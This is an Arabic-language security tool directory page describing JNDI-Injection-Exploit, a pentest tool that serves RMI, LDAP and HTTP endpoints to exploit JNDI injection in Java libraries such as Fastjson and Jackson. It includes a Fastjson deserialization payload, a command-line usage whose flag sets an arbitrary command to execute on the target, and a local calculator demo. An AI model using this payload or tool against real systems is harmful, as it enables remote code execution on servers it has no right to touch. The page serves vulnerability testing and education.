Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
JNDI-Injection-Exploit — أداة اختبار حقن JNDI (أداة تقوم بإنشاء روابط JNDI ويمكنها بدء عدة خوادم لاستغلال ثغرة حقن JNDI، مثل Jackson و Fastjson وغيرها) | Kitploit
أدوات/GitHubGitHub/welk1n/jndi-injection-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

أداة اختبار حقن JNDI (أداة تقوم بإنشاء روابط JNDI ويمكنها بدء عدة خوادم لاستغلال ثغرة حقن JNDI، مثل Jackson و Fastjson وغيرها)

عرض المستودع
2.8k730منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال حقن JNDI

مواد حول حقن JNDI

الوثائق الصينية

مقالات ذات صلة

الوصف

JNDI-Injection-Exploit هي أداة لتوليد روابط JNDI قابلة للعمل وتوفير خدمات خلفية عن طريق تشغيل خادم RMI وخادم LDAP وخادم HTTP. يعتمد خادم RMI وخادم LDAP على marshalsec وتم تعديلهما للربط مع خادم HTTP.

باستخدام هذه الأداة يمكنك الحصول على روابط JNDI، ويمكنك إدراج هذه الروابط في POC الخاص بك لاختبار الثغرة.

على سبيل المثال، هذا هو Fastjson vul-poc:

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

يمكننا استبدال "rmi://127.0.0.1:1099/Object" بالرابط الذي تم إنشاؤه بواسطة JNDI-Injection-Exploit لاختبار الثغرة.

إخلاء مسؤولية

جميع المعلومات والكود مقدمة للأغراض التعليمية و/أو اختبار أنظمتك الخاصة لهذه الثغرات فقط.

الاستخدام

قم بالتشغيل كالتالي

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

حيث:

  • -C - الأمر المنفذ في ملف الفئة البعيد.

    (اختياري، الأمر الافتراضي هو "open /Applications/Calculator.app")

  • -A - عنوان الخادم الخاص بك، قد يكون عنوان IP أو نطاق.

    (اختياري، العنوان الافتراضي هو عنوان أول واجهة شبكة)

نقاط يجب الانتباه إليها:

  • تأكد من أن منافذ الخادم الخاص بك (1099، 1389، 8180) متاحة.

    أو يمكنك تغيير المنفذ الافتراضي في فئة run.ServerStart السطور 26~28.

  • يتم تمرير أمرك إلى Runtime.getRuntime().exec() كمعلمات،

    لذا تحتاج إلى التأكد من أن أمرك قابل للعمل في طريقة exec().

    الأمر في bash مثل "bash -c ...." يحتاج إلى إضافة علامات اقتباس مزدوجة.

أمثلة

تجربة محلية:

  1. قم بتشغيل الأداة هكذا:

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    لقطة شاشة:

    image-20191018154346759

  2. افترض أننا حقنا روابط JNDI مثل rmi://ADDRESS/jfxllc التي تم إنشاؤها في الخطوة 1 في تطبيق ضعيف يمكن مهاجمته عن طريق حقن JNDI.

    في هذا المثال، يبدو كالتالي:

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    ثم عندما نقوم بتشغيل هذا الكود، سيتم تنفيذ الأمر،

    وسيتم طباعة السجل في الشل:

    image-20191018154515787

التثبيت

يمكننا اختيار إحدى الطريقتين للحصول على ملف jar.

  1. تنزيل أحدث إصدار من الإصدارات.

  2. استنساخ الكود المصدري محلياً وبنائه (يتطلب Java 1.8+ وMaven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

قيد العمل

  • (تم) دمج هذا المشروع مع JNDI-Injection-Bypass لتوليد روابط قابلة للعمل عندما تكون trustURLCodebase false في الإصدارات الأعلى من JDK افتراضيًا.
  • … ...
تنزيل الأداة